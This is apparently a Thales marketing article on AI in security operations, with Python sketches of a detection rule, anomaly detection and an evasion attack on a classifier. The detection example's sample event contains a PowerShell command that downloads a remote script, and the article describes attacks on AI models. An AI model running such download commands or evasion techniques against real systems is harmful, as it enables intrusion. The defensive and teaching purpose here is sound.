AI FOR CYBER: FASTER, EASIER & BETTER
In recent years, Artificial Intelligence (AI) has woven its way into the cybersecurity value chain. Today, everyone is talking about it. Expectations are high. Yet, it isn’t always easy to know exactly how AI can make cybersecurity systems more efficient and robust. Do the benefits outweigh the risks? How do you ensure your AI products comply with regulations?
Let’s dive a little deeper to explore the challenges and opportunities with some of our AI cybersecurity experts.
AI comes in many shapes and forms: Machine Learning, AI Analytics, Generative AI
Advances in AI are already making significant contributions to cybersecurity across a wide range of applications, from enhancing cyber detection to improving cyber protection. AI-powered algorithms and machine learning techniques are revolutionizing the way we identify and mitigate cyber threats. With the ability to analyze vast amounts of data in real-time, AI enhances the speed and accuracy of threat detection, enabling security systems to identify and respond to threats more effectively. AI algorithms can learn from historical data and patterns, continuously improving their ability to detect and prevent sophisticated cyber-attacks.
What’s more, AI is enabling us to automate routine tasks, freeing up security analysts to focus on more complex threat hunting and incident response activities. By leveraging the power of AI, organizations are able to strengthen their cyber defenses and stay one step ahead of evolving threats. For example, AI can be used to create detection rules that reduce response times to cyber intrusions, or to alert customers about cyber threats. Not to mention helping systems recover after an attack.
“In our Security Operations Centers (SOC), AI has the potential to speed things up, improve our understanding and even train collaborators – at a moment when the industry is experiencing a serious lack of cybersecurity talent. Of course, we need to make sure the tech is mature enough by carrying out extensive studies and testing. AI is helping on a first level basis,” highlights Paul Chauchis, SOC & Infrastructure Architect, Thales.
Putting GenAI into Action at Thales
Building tools based on a French-owned model (Mistral AI), the Thales teams have added their own expertise to develop a dedicated Thales solution based on generative AI: GenAI4AID, along with specific use cases to enhance our Managed Security Services in cybersecurity. These include automating SOC build to accelerate deployment, investigating threats to improve qualification and optimising emergency response. GenAI4AID has already been used by some of our clients to help our cyber and data engineers enhance intrusion detection. It automates rule management, making it easier to produce and test rules.
"GenAI allows us to define and implement detection rules more quickly, which we use to identify suspicious behaviors and vulnerabilities. For instance, one of our use cases based on generative AI involves designing detection rules that simplify the verification process by providing textual explanations of the identified risk," explains Adrien Becue, AI & Cyber Security Expert at Thales.
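To make the idea concrete, here is a minimal sketch of the kind of artifact this workflow produces: a Sigma-style detection rule carrying a plain-text explanation of the risk, evaluated against sample log events. The rule contents, field selectors and helper names are hypothetical illustrations, not GenAI4AID's actual output format.

```python
# Minimal sketch of a Sigma-style detection rule with a textual explanation.
# Rule contents and helper names are hypothetical, for illustration only.

rule = {
    "title": "Suspicious PowerShell Download",
    "explanation": (
        "Flags PowerShell processes whose command line fetches remote "
        "content, a common first stage of an intrusion."
    ),
    "detection": {  # every selector/value pair must match the event
        "Image|endswith": "powershell.exe",
        "CommandLine|contains": "DownloadString",
    },
}

def matches(event: dict, rule: dict) -> bool:
    """Return True if every detection condition matches the event."""
    for selector, needle in rule["detection"].items():
        field, _, op = selector.partition("|")
        value = event.get(field, "")
        if op == "endswith" and not value.endswith(needle):
            return False
        if op == "contains" and needle not in value:
            return False
    return True

events = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c (New-Object Net.WebClient)"
                    ".DownloadString('http://example.com/p.ps1')"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
]

for event in events:
    if matches(event, rule):
        print(f"ALERT: {rule['title']} -- {rule['explanation']}")
```

Attaching the explanation to the rule itself is what simplifies the verification step: an analyst reviewing the alert sees both the matching logic and the reasoning behind it.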
By incorporating AI algorithms and machine learning models into our SOC workflows, we can effectively analyze and correlate vast amounts of security data in real-time, identifying patterns and anomalies that may indicate a potential attack. Using AI also strengthens our proactive threat hunting capabilities, allowing us to stay ahead of emerging threats and rapidly respond to incidents. Integrating AI within our SOC operations helps us deliver advanced and comprehensive cybersecurity services to our clients, ensuring their critical assets and systems remain protected in today's constantly evolving threat landscape.
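The pattern-and-anomaly spotting described above can be sketched in a few lines. This toy example flags hours whose failed-login count deviates sharply from the baseline; the z-score detector, threshold and data are illustrative assumptions, not the production pipeline.

```python
# Toy sketch of statistical anomaly detection over security telemetry:
# flag hours whose failed-login count deviates strongly from the baseline.
from statistics import mean, stdev

def anomalous_hours(counts, threshold=2.5):
    """Return indices whose z-score exceeds the threshold."""
    mu, sigma = mean(counts), stdev(counts)
    return [i for i, c in enumerate(counts)
            if sigma and (c - mu) / sigma > threshold]

# Hourly failed-login counts: a quiet baseline with one burst
# (a possible brute-force attempt) at hour 7.
failed_logins = [3, 5, 4, 6, 2, 5, 4, 80, 3, 5]
print(anomalous_hours(failed_logins))  # the burst stands out
```

Production systems use far richer models, but the principle is the same: learn what normal looks like, then surface deviations for analysts to qualify.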
As a Managed Security Service Provider (MSSP), we collaborate with leading partners such as Microsoft, IBM, and Google at the forefront of artificial intelligence. We leverage their generative technologies like Copilot or Gemini, as well as the predictive capabilities embedded in their products, to enhance the quality of our managed security services. This enables us to optimize the detection and response to our clients' security incidents.
High Potential and Careful Testing
Many of our customers are already excited about these advances. In a recent survey, 70% felt that AI-embedded detection and response solutions guaranteed effectiveness – provided they were carefully tested and the results conclusive.
“There are big expectations in relation to AI, but there is still a gap with the reality on the ground. Many of our customers are looking for the fastest, most efficient and cost-effective solutions. That is exactly what we aim to provide regardless of the technology used – keeping a close eye on the cost-benefit ratio of embedding AI. For governments and global organizations, minimizing risk is also a priority. They need to know that AI-generated results can be trusted for critical decision-making. If we use AI, it therefore needs to be reliable and well trained – which is why our teams are their own most exacting client,” highlights Thierry Hua, Senior Cybersecurity Solution Architect, Thales.
Ensuring AI is Compliant and Robust
AI technology is advancing quickly. It is therefore essential to make sure that AI products are secure, transparent and high quality, especially in the wake of recent laws like the AI Act. To help customers achieve compliance with this EU-wide artificial intelligence framework – as well as other regulations including GDPR, DORA and NIS2 – our cyber compliance and governance consulting teams provide tailored support.
AI products also need to be robust as attackers get better at targeting AI systems. These attacks include data poisoning, evasion and oracle attacks, and attempts to steal chatbot training data – among many others. We perform adversarial AI attacks on representative target infrastructures to identify vulnerabilities that could affect our customers – making it harder for the real cybercriminals to get in. Managed by our Security and Reliability Evaluation Lab, this AI hacking helps us test the resilience and security of both hardware and software products containing AI – enabling us to lead the way towards the future certification of AI-enabled solutions.
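One of the attack classes mentioned, evasion, can be illustrated with a toy example: a fast-gradient-sign-style perturbation that nudges a sample past a linear classifier's decision boundary. The model, weights and step size here are invented for illustration and have nothing to do with the lab's actual tooling.

```python
# Toy sketch of an evasion attack (FGSM-style) on a hand-rolled linear
# classifier -- illustrative only.
import math

w = [2.0, -1.5, 0.5]   # weights of a toy "malicious vs. benign" scorer
b = -0.2

def score(x):
    """Sigmoid of the linear score: probability the sample is malicious."""
    z = sum(wi * xi for wi, xi in zip(w, x)) + b
    return 1.0 / (1.0 + math.exp(-z))

def evade(x, eps=0.6):
    """Fast-gradient-sign step: nudge each feature against the gradient
    so the malicious score drops, changing each feature by at most eps."""
    # The score's gradient w.r.t. x_i has the sign of w_i,
    # so subtract eps * sign(w_i) from each feature.
    return [xi - eps * math.copysign(1.0, wi) for xi, wi in zip(x, w)]

sample = [1.0, 0.2, 0.8]          # initially scored as malicious
adv = evade(sample)
print(score(sample), score(adv))  # the score drops after the perturbation
```

Red-teaming exercises probe models with exactly this kind of crafted input, at much larger scale, to measure how easily a detector can be pushed across its decision boundary – and which countermeasures close the gap.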
In November 2023, our Friendly Hackers team came out on top in the CAID challenge organized by the French Ministry of Defense – aimed at assessing the attacking teams’ ability to exploit intrinsic vulnerabilities in AI models. This win further demonstrates our technical capabilities to test the security of AI algorithms in order to protect training datasets and intellectual property. By identifying vulnerabilities, relevant countermeasures can be recommended as part of a reinforced security approach.
New Applications, Same Exacting Standards
Is AI a miracle solution for cyber? No, but it is already a powerful enabler that can help make cybersecurity systems more effective – provided that the products are carefully tested and regulated. This innovative yet careful approach lies at the heart of our strategy with the aim of providing the most adapted solution for each customer – using AI when it adds proven value and minimal risk.
“If we want to provide innovative, high-performance solutions that can be relied on, we need to take the time to do it right, always focusing on quality, robustness and accuracy. Moving forward, we will continue to optimize our existing AI use cases while exploring new ones in prevention and protection,” concludes Adrien.
Keen to understand how AI can help reinforce your cybersecurity strategy?
Looking to deploy intrusion detection rules more quickly and efficiently?